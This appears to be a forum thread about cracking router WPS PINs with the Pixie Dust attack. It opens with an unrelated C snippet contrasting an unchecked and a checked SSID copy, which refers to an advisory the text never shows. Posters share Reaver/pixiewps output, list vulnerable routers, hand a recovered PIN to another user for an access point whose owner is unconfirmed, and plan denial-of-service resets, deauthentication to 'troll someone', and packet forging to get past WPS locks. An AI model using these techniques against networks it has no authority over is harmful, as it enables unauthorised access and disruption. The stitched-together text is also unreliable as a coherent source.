If you are worried about this, I suggest you get an AP that supports 802.11w. Read about it here: http://www.cisco.com/c/en/us/td/docs/wireless/controller/technotes/5700/software/release/ios_xe_33/11rkw_DeploymentGuide/b_802point11rkw_deployment_guide_cisco_ios_xe_release33/b_802point11rkw_deployment_guide_cisco_ios_xe_release33_chapter_0100.pdf

Let me know what you think about this!
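
The length mismatch the advisory describes (an 8-bit element length landing in a 32-octet buffer) in miniature, as an added example in C that is not wpa_supplicant's code: a minimal element walker, the unchecked copy beside the bounds-checked one, and constructed frames to exercise them. The SSID element id, the struct layout and the return codes are assumptions for this sketch.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SSID_MAX_LEN 32      /* valid SSID range is 0-32 octets */
#define IE_ID_SSID   0       /* SSID element id (assumption for this sketch) */

/* Stand-in for the heap-allocated peer record: a fixed 32-byte SSID buffer
 * with other fields laid out right after it. */
struct peer_dev {
    uint8_t  ssid[SSID_MAX_LEN];
    size_t   ssid_len;
    uint32_t guard;          /* stands in for the fields an overrun would clobber */
};

/* Walk the TLV-encoded frame body for an element with the given id.
 * Returns its payload and sets *out_len, or NULL if absent or truncated. */
const uint8_t *find_ie(const uint8_t *body, size_t body_len,
                       uint8_t id, uint8_t *out_len)
{
    size_t pos = 0;
    while (pos + 2 <= body_len) {
        uint8_t ie_id  = body[pos];
        uint8_t ie_len = body[pos + 1];          /* 8-bit length: 0..255 */
        if (pos + 2 + ie_len > body_len)
            return NULL;                         /* element runs past the frame */
        if (ie_id == id) {
            *out_len = ie_len;
            return body + pos + 2;
        }
        pos += 2 + ie_len;
    }
    return NULL;
}

/* The defective shape: the element length is trusted, so up to 255 bytes can
 * land in a 32-byte buffer. Kept for comparison only, never fed oversized data here. */
int update_peer_ssid_unchecked(struct peer_dev *dev, const uint8_t *body, size_t body_len)
{
    uint8_t len;
    const uint8_t *ssid = find_ie(body, body_len, IE_ID_SSID, &len);
    if (!ssid)
        return -1;
    memcpy(dev->ssid, ssid, len);                /* overflow when len > 32 */
    dev->ssid_len = len;
    return 0;
}

/* The corrected shape: the length is validated before anything is copied and
 * an out-of-range element is rejected as malformed. */
int update_peer_ssid_checked(struct peer_dev *dev, const uint8_t *body, size_t body_len)
{
    uint8_t len;
    const uint8_t *ssid = find_ie(body, body_len, IE_ID_SSID, &len);
    if (!ssid)
        return -1;
    if (len > SSID_MAX_LEN)
        return -2;                               /* the check the vulnerable path lacked */
    memcpy(dev->ssid, ssid, len);
    dev->ssid_len = len;
    return 0;
}

/* Constructed frame body (not captured traffic): SSID "hello" then a one-byte element. */
static const uint8_t valid_body[] = { IE_ID_SSID, 5, 'h', 'e', 'l', 'l', 'o', 0x03, 0x01, 0x06 };

/* Constructed truncated body: claims 32 octets of SSID but carries two. */
static const uint8_t truncated_body[] = { IE_ID_SSID, 32, 'a', 'b' };

/* Runs the checked updater on the valid frame; returns the stored SSID length. */
int demo_valid_ssid(void)
{
    struct peer_dev dev = { {0}, 0, 0xC0FFEE };
    if (update_peer_ssid_checked(&dev, valid_body, sizeof valid_body) != 0)
        return -1;
    return (int)dev.ssid_len;
}

/* Runs the checked updater on a 64-octet SSID element; returns the rejection
 * code only if the neighbouring fields were left untouched. */
int demo_oversized_ssid(void)
{
    uint8_t body[2 + 255];
    body[0] = IE_ID_SSID;
    body[1] = 64;
    memset(body + 2, 'A', 64);
    struct peer_dev dev = { {0}, 0, 0xC0FFEE };
    int rc = update_peer_ssid_checked(&dev, body, 2 + 64);
    return (dev.guard == 0xC0FFEE && dev.ssid_len == 0) ? rc : -99;
}

/* Runs the checked updater on the truncated frame; the walker rejects it first. */
int demo_truncated_ssid(void)
{
    struct peer_dev dev = { {0}, 0, 0xC0FFEE };
    return update_peer_ssid_checked(&dev, truncated_body, sizeof truncated_body);
}
```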

aanarchyy
2015-04-30, 00:31
Where can I get a copy of this firmware everyone is picking apart right now? I've tried to find some Arris firmwares (as some seem to be invulnerable to pixie) but they are apparently very tightly guarded and I do not own one or I would dump it myself. Definitely no downloads for them, but if I get my hands on one physically... different story :-D
email username @ gmail

soxrok2212
2015-04-30, 00:40
Where can I get a copy of this firmware everyone is picking apart right now? I've tried to find some Arris firmwares (as some seem to be invulnerable to pixie) but they are apparently very tightly guarded and I do not own one or I would dump it myself. Definitely no downloads for them, but if I get my hands on one physically... different story :-D
email username @ gmail

http://sourceforge.net/projects/alfanetwork/files/Firmware/

Alfa AIP-W525H I believe.... not sure if it is v1 or v2 though.

nuroo
2015-04-30, 15:35
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4

000000000:6F:D4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


Greenwave Systems, no wikidevi, fccid (http://fccid.net/number.php?fcc=Z3M-G1100&id=793358#axzz3Yo4s4Bzn)

NOT Vulnerable

aboulatif
2015-04-30, 16:12
does not work on Technicolor TD5130 V1 and THOMSON AP

soxrok2212
2015-04-30, 18:27
Worked fine for me when I tested. You need to wait for the whole realtek tool to be released. It is almost done.

nuroo
2015-04-30, 19:00
Big Teaser !

aboulatif
2015-04-30, 19:15
soxrok2212 I have tried many times on my network but no result:confused:

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Switching mon0 to channel 1
[+] Waiting for beacon from 18:17:25:xx:xx:xx
[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:86:d7:2d:5a:11:c1:36:51:97:d7:16:54:c3:de:7f
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Technicolor
[P] WPS Model Name: Technicolor TD5
[P] WPS Model Number: Technicolor TD5
[P] Access Point Serial Number: 1343A1D22901
[+] Received M1 message
[P] R-Nonce: c0:68:f8:86:c5:14:c2:aa:d8:5f:56:29:51:0c:fd:d4
[P] PKR: 58:f7:89:a6:11:fc:9e:ad:b1:a5:e5:e8:97:5b:4c:e3:f9 :a2:3c:d0:81:70:cf:4f:59:fd:bd:d1:7f:fe:fc:a0:28:6 4:46:fc:da:31:61:88:65:09:86:66:4b:9f:37:af:68:3b: 9e:1f:fd:bd:aa:09:f6:5b:b2:8d:da:e2:cf:cd:c5:5b:8c :87:82:e8:d4:8f:b8:9c:22:8e:ca:c2:ad:c3:43:01:4e:d 9:39:0b:ec:a9:12:bd:ba:02:a9:69:30:de:61:6d:da:cd: 47:80:9c:d9:39:4d:e3:40:c4:38:13:6d:15:f2:b1:68:9e :e4:45:0b:e9:0b:ba:bb:2e:7b:96:d4:c6:c2:8e:e6:07:8 c:fe:35:6d:7a:fd:8c:ca:24:d7:87:b7:b5:fd:8d:32:e7: e6:fa:5d:01:eb:d6:8a:aa:16:89:7a:63:ec:db:e1:60:01 :0f:0b:92:90:ba:e0:33:35:57:f5:01:63:36:0e:b1:46:6 a:70:99:cf:5c:49:6e:40:3c
[P] AuthKey: f4:8d:63:52:60:ad:82:9e:7e:72:b4:84:82:bb:df:5d:0d :29:76:55:a4:07:57:9f:5a:92:07:17:19:53:42:ac
[+] Sending M2 message
[P] E-Hash1: 99:9f:06:06:d4:39:af:ba:43:40:bc:f3:42:db:04:64:e5 :cf:b3:ed:a7:f6:40:a9:f0:d0:eb:df:5c:91:67:79
[P] E-Hash2: 9c:94:a1:72:b8:36:02:47:cd:50:44:d2:2f:fe:49:d8:68 :62:b7:de:84:ac:4a:a8:9e:75:a2:24:bf:37:ba:91
[Pixie-Dust]
[Pixie-Dust] [-] WPS pin not found!
[Pixie-Dust]
[Pixie-Dust] Time taken: 1 s
[Pixie-Dust]

soxrok2212
2015-04-30, 19:48
Try this PIN and let me know if it works: 76734052
I really hope this is your own AP... by using that PIN you agree that I am not responsible for any trouble you may get into.

wiire
2015-04-30, 21:37
@aboulatif
Hey just a curiosity of mine... Is the WAN MAC of that router 18:17:25:2C:0B:75?

Quest
2015-04-30, 21:44
he forgot to blank out a line, so no wiire.


"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"

Saydamination
2015-04-30, 21:45
Model name = model number ...

Example..

RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )

:)

Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark

soxrok2212
2015-04-30, 21:55
Manufacturer: Greenwave
Device Name: GreenWave BHR4
Model Number: 4

000000000:6F:D4| 1|-61|1.0|No |FiO00000000| GreenWave| 4|


Greenwave Systems, no wikidevi, fccid (http://fccid.net/number.php?fcc=Z3M-G1100&id=793358#axzz3Yo4s4Bzn)

NOT Vulnerable

Send me the cap :D I'd like to look into it.

wiire
2015-05-01, 09:48
he forgot to blank out a line, so no wiire.


"[+] Associated with 18:17:25:2C:0B:7A (ESSID: WIFI 14)"

That's the WLAN MAC.

I was asking for the WAN MAC = 18:17:25:2C:0B:7A - 5 = 18:17:25:2C:0B:75

wiire
2015-05-01, 09:59
Model name = model number ...

Example..

RTL8187 >>>> RTL ( Model name) 8187 ( Model number) ...

Other values about modem manufacturer, not wps manufacturer ( 1.0.1.1 , 1 , 1234 )

:)

Old version or invulnerable chipsets are different. They should be well analyzed on Wireshark

You shouldn't look too much into this. Manufacturers put what they want in those fields. Sometimes they put the valid model number, name, serial or whatever, sometimes they put something else, for example '123456' (or '1234' or whatever) which is like a blank field (I guess they can't put zeroes).

Reaver prints that information only to give you a (sometimes vague) idea of what the chipset brand/model could be. The cracking is performed by pixiewps, which doesn't use this information.

aanarchyy
2015-05-01, 16:04
@soxrok2212 here is a cap of the same router type, if you can get me a pin and/or tell me how that would rok ;-)


http://d-h.st/9dE1

wiire
2015-05-01, 19:38
Pixiewps 1.1 is out! :)

See the original thread (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool&p=44817&viewfull=1#post44817).

psicomantis
2015-05-02, 00:24
Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?

popthattif
2015-05-02, 01:05
just add -f 4

psicomantis
2015-05-02, 01:19
And would you add this argument always?

popthattif
2015-05-02, 02:41
At first I tried it without that option on a router with a Realtek chipset and it didn't find the pin, then I tried it with -f 4 and it took about 600s, then BOOM pin found

wiire
2015-05-02, 09:34
Hey guys, I am a little bit confused as to the usage of -f in the new pixiewps. It refers to mode4??? anyone kind enough to clarify?

Yes sorry, I should've clarified. The --force option is used only for what I call mode 4, which is Realtek's PRNG seed bruteforce. I was planning on adding mode selection but I didn't, and I left those modes on the usage screen, and I didn't want to explicitly refer to vendors in the program.

The best practice is to run the program without -f, and if you get a warning saying that the router might be vulnerable to mode 4 it means that you may want to try again with -f or with another set of data that could lead you to (mode 2) secret nonces = enrollee nonce. I also refer to modes because that's how the program runs internally: it tries every possible vulnerability. When it bruteforces the new PRNG though (that is mode 4) it normally tests only a small window of time (approximately 10 days) because the new bruteforce is more power consuming.

So --force is basically used only if the router has set its time to the past (more than 10 days ago). To exhaust it probably takes 20 - 30 mins. Also -f doesn't take any argument. The program just doesn't complain if you pass it some extra arguments. I gotta fix that. :)

Also would you mind replying on the pixiewps thread for program related questions? Thanks.

hamada
2015-05-04, 02:13
hi wiire can you tell me which command I should use against a Realtek chipset?

kcdtv
2015-05-04, 11:22
Hello hamada and welcome to the forum
mmm... ¿Did you read the line just before your message?

Also would you mind replying on the pixiewps thread for program related questions? Thanks.
Maybe you are not used to forums, but you have to put your question in the correct thread.
Your question is strictly about pixiewps usage and this thread is about the pixie dust breach
You should have asked your question in this thread (https://forums.kali.org/showthread.php?25018-Pixiewps-wps-pixie-dust-attack-tool)
By the way...
..., if you read a little you will find the answer to your question... read before asking, so that the forum is not full of duplicated content :)

soxrok2212
2015-05-04, 19:44
@nuroo @aanarchyy I looked for more info on the data you sent me (caps and reaver output). Upon looking at the beacon frames in the cap that aanarchyy sent me, I see that the Greenwave G1100 uses a Broadcom 802.11N/AC chip, more specifically I believe that it may be the BCM4360: https://wikidevi.com/wiki/Broadcom... AFAIK the G1100 is 3x3:3 on 2.4GHz and 3x3:3 on 5GHz. Assuming so, that leads me to the conclusion above. With the lack of documentation, the only way to find out for sure would be to order one and open it up but FiOS is not available in my area and I don't have $200-$300 to spend on it... I don't even see their firmware available anywhere online...

aanarchyy
2015-05-04, 20:34
If i can get my hands on one, i will gladly dump it and share. As of recently, I've been poking around a dump i did the other day of a Belkin F9K1001 v1 ( https://wikidevi.com/wiki/Belkin_F9K1001_v1 ) to see what i can find. Found it at the swap shed of the dump in my town so i had no issues pulling the flash chip off and dumping it. I pick up all kinds of random embedded devices to tinker with. I've got somewhere over a dozen or so assorted routers/repeaters (Old comcast, old verizon, belkin, dlink, buffalo, netgear, linksys, and some random weird ones) i'd be glad to dump/decompress/decompile/share if anyone would find it useful :-) I'm kinda sucky at reading assembly but I'm learning...

soxrok2212
2015-05-04, 20:49
Any Comcast /Cisco DPC3939?

nuroo
2015-05-04, 20:51
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No Fios at my location also. Least you were able to deduce it's a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if a new company came out of the woodwork with a new chipset all on their own.

@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.

aanarchyy
2015-05-04, 20:53
Not sure, I'll check as soon as i get home. I think the only two comcast ones i have are the old actiontec ones, not sure the chipsets but i'll look.

nuroo
2015-05-04, 21:17
G1100 firmware is not available for public download.

As per the folks @ dslreports, (http://www.dslreports.com/forum/r29583793-Quantum-Gateway-Router~start=60) who have the router - new firmware is made available to customers internally thru their network.

soxrok2212
2015-05-04, 21:19
@soxrok2212
gave u full dump, no filters. beacons should be in the .cap
No Fios at my location also. Least you were able to deduce it's a broadcom chip, never heard of greenwave b4 this. Was gonna be impressed if a new company came out of the woodwork with a new chipset all on their own.

@aanarchy
I will try to find out if G1100 can be updated, if firmware is available.

Hey, the cap I got from you only has the WPS exchange in it, I didn't see any beacons...

aanarchyy
2015-05-04, 21:40
@nuroo already checked, completely unavailable, only way to get it is dump a live device. Same with the xfinity arris routers, found on a website that the firmware is "closely guarded".

undersc0re
2015-05-05, 04:05
I am trying my best to figure this out, I have been testing on a broadcom and zyxel router, It never spits out the 2 hashes for them, am I missing something simple here? Of course you need the 2 hashes to get the pin. It spits out the other necessary keys/info. My kali was updated this evening. Edit-I figure it's because the router is not supported.

some1
2015-05-05, 06:39
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

Saydamination
2015-05-05, 08:32
Wps Pixie Dust Attack is VULNERABLE for all ZTE modems...

t6_x
2015-05-05, 15:36
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

The person who prepared this attack (blackjack) is a bit confused about how things work.

First, RS-1 is a random value generated by the Registrar, and it is different from ES-1.

ES-1 remains unknown.

The generation of the registrar's R-Hash1 has always been known.

What the author is confused about is PSK1; in the data travelling over the WPS protocol, ES-1 and ES-2 are never sent to the registrar.

R-Hash1 is generated by the registrar with its PSK1, using the RS-1 random number generated by the registrar.

A check of R-Hash1 is made by the Enrollee but using the Enrollee's PSK1, and the Enrollee's PSK1 is correct.

Then the Enrollee's R-Hash1 will be different from the registrar's R-Hash1 because PSK1 is different, and if you have to check all 11,000 possibilities, then you are doing what reaver does, which is to test all known pins.

It is not possible to repeat message M4 indefinitely because there is a protocol to be followed; it is necessary to go through M1, M2, M3 to then send M4, so it is the same thing as reaver, which is to test all pins.

Apparently the author was confused about where the keys go and who checks them.

The author's error is here:

"The Enrollee sens the first secret nonce, E-S1. The Register knows if the Enrollee knows the first half of the PIN."

This is done the other way around: the Registrar sends R-S1 and the enrollee knows if the registrar knows the first half of the pin.



Another error in how things work:

"Pixie Dust attack blah blah, we have to pretend que the Register crates predictable random number."

The random number is generated in the registrar, and the registrar in this case is Kali Linux. How will you generate a random number that you already know? This article has a lot wrong in it.

Quest
2015-05-05, 15:43
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!

Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!

soxrok2212
2015-05-05, 16:43
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!

Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!

Haha I love that ^^ Anyways, I need some help from some of you really smart experienced guys out there. I still have a lot of homework to do with the topic but I was looking into tkiptun-ng... more specifically injecting "arbitrary packets." Does anyone know what kind of stuff we can inject? I'm wondering if we can somehow maybe magically with a little bit of "pixie dust" ;) initialize PBC or something similar? I'm really not sure, just thinking :)

Saydamination
2015-05-05, 17:23
so then guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
:) :) :)

Yeah. He is absolutely right...

soxrok2212
2015-05-05, 17:31
Yeah. He is absolutely right...

The blackjack attack is wrong. He got the WPS specification backwards. If the AP were the Registrar and the Client were the Enrollee, then it would work fine but unfortunately that is not the case.

aanarchyy
2015-05-05, 17:36
The author knows he was wrong, right at the top of the page it says:

Erratum : I thought the Enrollee was the client, and the Registrar the AP (see spec :

Enrollee: A Device seeking to join a WLAN Domain. Once an Enrollee obtains a valid credential, it becomes a Member.
Registrar: An entity with the authority to issue and revoke Domain Credentials. A Registrar may be integrated into an AP, or it may be separate from the AP. A Registrar may not have WLAN capability. A given Domain may have multiple Registrars.

, but I was wrong. Thus, what I wrote below contains errors. Correction and implementation are left as an exercise to the reader.

Love that we have our own little "kitchen" now :D

soxrok2212
2015-05-05, 17:41
So anyways, is anyone familiar with tkiptun-ng and packetforge-ng?

aanarchyy
2015-05-05, 20:33
Like send it malformed packets and make it trigger a PBC? That's an interesting idea. I remember a while ago i was doing some packet manipulation scripting and i found scapy to be VERY useful for the project i was doing. Probably be a good tool to use for that.

soxrok2212
2015-05-05, 21:05
Like send it malformed packets and make it trigger a PBC? That's an interesting idea. I remember a while ago i was doing some packet manipulation scripting and i found scapy to be VERY useful for the project i was doing. Probably be a good tool to use for that.

You took the words right out of my mouth, thats exactly what I was thinking. I actually had 3 ideas.

1: Trigger PBC
2: Trigger AP to accept a client's WPS pin
3: Send an M8 packet to attempt to reconfigure the AP

I'm not so sure that any of these ideas will work since I'm no super hacker or programmer, but it is just something I see possible :)

Also, there has been updates to tkiptun-ng: http://download.aircrack-ng.org/wiki-files/doc/tkip_master.pdf

aanarchyy
2015-05-05, 21:14
Hrm, that gave me an idea. I can hook up to a router(uart, spi sniffing, or whatever) and see what goes on inside the router during a wps transaction. See if there is anything exploitable.

soxrok2212
2015-05-05, 21:16
Hrm, that gave me an idea. I can hook up to a router(uart, spi sniffing, or whatever) and see what goes on inside the router during a wps transaction. See if there is anything exploitable.

Do it! :D Lemme know if you find anything.

--If we find something, I'll start a new thread since its not really Pixie Dust related.

aanarchyy
2015-05-05, 21:31
Do it! :D Lemme know if you find anything.

--If we find something, I'll start a new thread since its not really Pixie Dust related.

I'll see what i can get done tonight, even if i can find a way to freeze/reset/dos the router it would be useful for resetting wps locks

soxrok2212
2015-05-05, 21:53
I'll see what i can get done tonight, even if i can find a way to freeze/reset/dos the router it would be useful for resetting wps locks

Yeah, a reset would be excellent. I've been trying a bunch of ways but haven't been successful. I've been thinking about probing an AP hundreds of times per second with invalid characters in order to reset it... haven't been able to try that yet (MDK3 doesn't support this operation... yet :))

Quest
2015-05-05, 21:55
never a dull moment.. :cool:

aanarchyy
2015-05-05, 22:57
If the knoppix-std forum was still up, I could direct you to the script i wrote that used scapy. Wasn't much, it just watched an ap, and dynamically disassoc/deauthed any clients that tried to connect to the ap that weren't on the "whitelist", sort of an active ap protection. Wish i still had a copy of it so i could see how i did it :-/
Oh well, off to do my favorite thing, hardware hacking!
If i come up with anything useful, I'll start a new thread to hopefully get some R&D into it :-D

soxrok2212
2015-05-05, 23:35
If the knoppix-std forum was still up, I could direct you to the script i wrote that used scapy. Wasn't much, it just watched an ap, and dynamically disassoc/deauthed any clients that tried to connect to the ap that weren't on the "whitelist", sort of an active ap protection. Wish i still had a copy of it so i could see how i did it :-/
Oh well, off to do my favorite thing, hardware hacking!
If i come up with anything useful, I'll start a new thread to hopefully get some R&D into it :-D

So it's like MDK3's WPA downgrade mode?? That's essentially the same thing it does... just deauth until the owner reboots/downgrades to WEP/tries no security at all.

aanarchyy
2015-05-05, 23:46
Nope, it was a straight up DOS, it could be set up to protect an AP from any unknown clients, or set up to deny a specified client(s) from assoc/auth to any AP I could see.

More or less it was just used to either protect an AP, or just troll someone ;-)

soxrok2212
2015-05-05, 23:52
Nope, it was a straight up DOS, it could be set up to protect an AP from any unknown clients, or set up to deny a specified client(s) from assoc/auth to any AP I could see.

Ah interesting. Well there's really 3 things on my mind right now.

1: Have t6_x's Reaver print PKE, PKR all that stuff with -vvv (as well as sending M1, M2, etc). I've already contacted him about that, hopefully we will see it soon :D
2: Get someone who knows C (or who can modify MDK3) and try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP

That's basically my agenda... if anyone wants to assist me that would be great :)

aanarchyy
2015-05-06, 00:00
Ah interesting. Well there's really 3 things on my mind right now.

1: Have t6_x's Reaver print PKE, PKR all that **** with -vvv (as well as sending M1, M2, etc). I've already contacted him about that, hopefully we will see it soon :D
2: Get someone who knows C (or who can modify MDK3) and try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP

That's basically my agenda... if anyone wants to assist me that would be great :)

As said earlier, probably best to open a new thread about this, as it is not really pixie related. Put all your ideas in the OP and everyone can collectively(hopefully) make something of it.

But for now, im still poking at this effin router to make it do something interesting D-:<

soxrok2212
2015-05-06, 00:03
As said earlier, probably best to open a new thread about this, as it is not really pixie related. Put all your ideas in the OP and everyone can collectively(hopefully) make something of it.

If I can find a little more open time I will... I'll do a big writeup about it.

soxrok2212
2015-05-06, 21:40
Just a quick note on the original post, DH Keys are not calculated with a PRNG, it's modular arithmetic with the function described below... I updated that. Sorry for the confusion.

soxrok2212
2015-05-09, 20:18
I also forgot to note, MediaTek is vulnerable too! Same problem as Ralink (since MediaTek took over Ralink a few years ago.)

iliass
2015-05-09, 22:52
Hey #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V1 but TD5130 V3 does not work, why?

soxrok2212
2015-05-10, 00:21
Hey #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V1 but TD5130 V3 does not work, why?

I don't know I don't have one to try.

iliass
2015-05-10, 12:44
Ok i will send you a handshake for TD5130 V3 ..ok, to add this realtek in pixiewps and reaver

iliass
2015-05-10, 12:45
Give me your Gmail plz

mushinz
2015-05-11, 01:02

it keeps looping :S

Saydamination
2015-05-11, 08:41
Hey #soxrok2212 ..Thanks for pixiewps 1.1 ..it works on TD5130 V1 but TD5130 V3 does not work, why?

Pixiewps works if ES1=ES2 ...if not, invulnerable.. You can look at all the results...

Some manufacturer use really easy way to create PIN... Serial numbers , Ad-hoc or other..

They can create new -K options like -K 4 , -K 5 , -K 6 or -W 3 -W 4 ...

Pixiewps is a great project .. User friendly, customer friendly.....

scorpius
2015-05-11, 15:28
I just checked the database and no broadcom units are vulnerable. I was sure someone posted that only some broadcoms are. Have there been any such cases?

soxrok2212
2015-05-11, 15:47
I just checked the database and no broadcom units are vulnerable. I was sure someone posted that only some broadcoms are. Have there been any such cases?

I think someone reported success but they didn't list any specifics.

iliass
2015-05-12, 12:05
#Saydamination .yes but i have a handshake.cap ..i will send it to #soxrok2212 ..just give me your email plz

nuroo
2015-05-12, 16:04
TRENDnet TEW-691GR - VULNERABLE

Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678

chipset, ralink RT3883

wikidevi (https://wikidevi.com/wiki/TRENDnet_TEW-691GR)

soxrok2212
2015-05-12, 17:19
TRENDnet TEW-691GR - VULNERABLE

Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678

chipset, ralink RT3883

wikidevi (https://wikidevi.com/wiki/TRENDnet_TEW-691GR)

Thanks I'll add it later

soxrok2212
2015-05-13, 22:04
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?

wn722
2015-05-14, 06:49
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?

where?
......

soxrok2212
2015-05-14, 10:39
where?
......
Vendor implementations.

nuroo
2015-05-14, 20:37
@wn722
I'm glad u asked. I had the same question. Didn't realize main page updated.

@soxrof2212
I'll help test if u guys come up with something.

soxrok2212
2015-05-14, 20:56
@wn722
I'm glad u asked. I had the same question. Didn't realize main page updated.

@soxrof2212
I'll help test if u guys come up with something.

I usually update the main page regularly....depends on what I find. It's usually just errors or something stupid but yeah it should say on the bottom when the last update was.

wn722
2015-05-15, 11:28
cheers. good on Atheros for keeping it safe.

dragood
2015-05-15, 20:07
why not use untwister to bruteforce the original seed and find the pin?
its available on github, its a seed "recovery" tool

t6_x
2015-05-16, 11:40
why not use untwister to bruteforce the original seed and find the pin?
its available on github, its a seed "recovery" tool

The reason is because not supported routers use the /dev/urandom to generate the random numbers.

The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

dragood
2015-05-18, 05:53
The reason is because not supported routers use the /dev/urandom to generate the random numbers.

The Untwister, only supports basic PRNG of certain libraries (Glibc's, Mersenne Twister, PHP's MT-variant, Ruby's). These are simple and easy to crack PRNG.

But not supported routers use the /dev/urandom, which is safer and complicated to manage to find the seed.

as far as i can tell, only Atheros uses /dev/random. Also Dominique Bongard clearly stated that these seeds could be found in seconds with a decent computer. which algorithm the prng uses is stated anywhere as far as i have read.
also Dominique pointed out that the seed was very low entropy, only 32 bits!!, it's nothing impossible to crack in minutes with any home computer. the only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Bongard's Presentation....Literally....the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which is really not much of "hacking". the only problem we are facing now, is someone needs to know how to write code to find the state of the PRNG, once that's found we generate random numbers, hash the result with hmac_sha-256. and then simply compare the results to what the router gave us. once we see they are the same, we know we have the correct seed, from that we can find ES-1 and ES-2 (I'm using broadcom as an example since it generates both nonces right after the M1 message). This is by far the simplest thing, I'm honestly very surprised broadcom hasn't been cracked yet. it's really not that complicated. Let's not forget Dominique Bongard was able to pwn every router out there. even Atheros with their "hard to crack" /dev/random prng.

soxrok2212
2015-05-18, 11:40
as far as i can tell, only Atheros uses /dev/random. Also Dominique Bongard clearly stated that these seeds could be found in seconds with a decent computer. which algorithm the prng uses is stated anywhere as far as i have read.
also Dominique pointed out that the seed was very low entropy, only 32 bits!!, it's nothing impossible to crack in minutes with any home computer. the only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Bongard's Presentation....Literally....the only reason we're able to get the pin now is because we assume ES-1 = ES-2 = 0. which is really not much of "hacking". the only problem we are facing now, is someone needs to know how to write code to find the state of the PRNG, once that's found we generate random numbers, hash the result with hmac_sha-256. and then simply compare the results to what the router gave us. once we see they are the same, we know we have the correct seed, from that we can find ES-1 and ES-2 (I'm using broadcom as an example since it generates both nonces right after the M1 message). This is by far the simplest thing, I'm honestly very surprised broadcom hasn't been cracked yet. it's really not that complicated. Let's not forget Dominique Bongard was able to pwn every router out there. even Atheros with their "hard to crack" /dev/random prng.

Where did you hear he could crack any router? I've been talking a lot with him and he has said that Atheros looked pretty secure. The thing with /dev/random is that it has external sources of entropy that get increasingly more difficult to crack. It's not just find the seed and we're done, it's a whole lot more complicated than that

nuroo
2015-05-18, 13:07
Interesting reading on this thread.....

Here's another router
Linksys WRT110 Vulnerable

[P] WPS Manufacturer: Linksys Inc.
[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678

CPU1: Ralink RT2780

wikidevi (https://wikidevi.com/wiki/Linksys_WRT110)

soxrok2212
2015-05-18, 14:45
Interesting reading on this thread.....

Here's another router
Linksys WRT110 Vulnerable

[P] WPS Manufacturer: Linksys Inc.
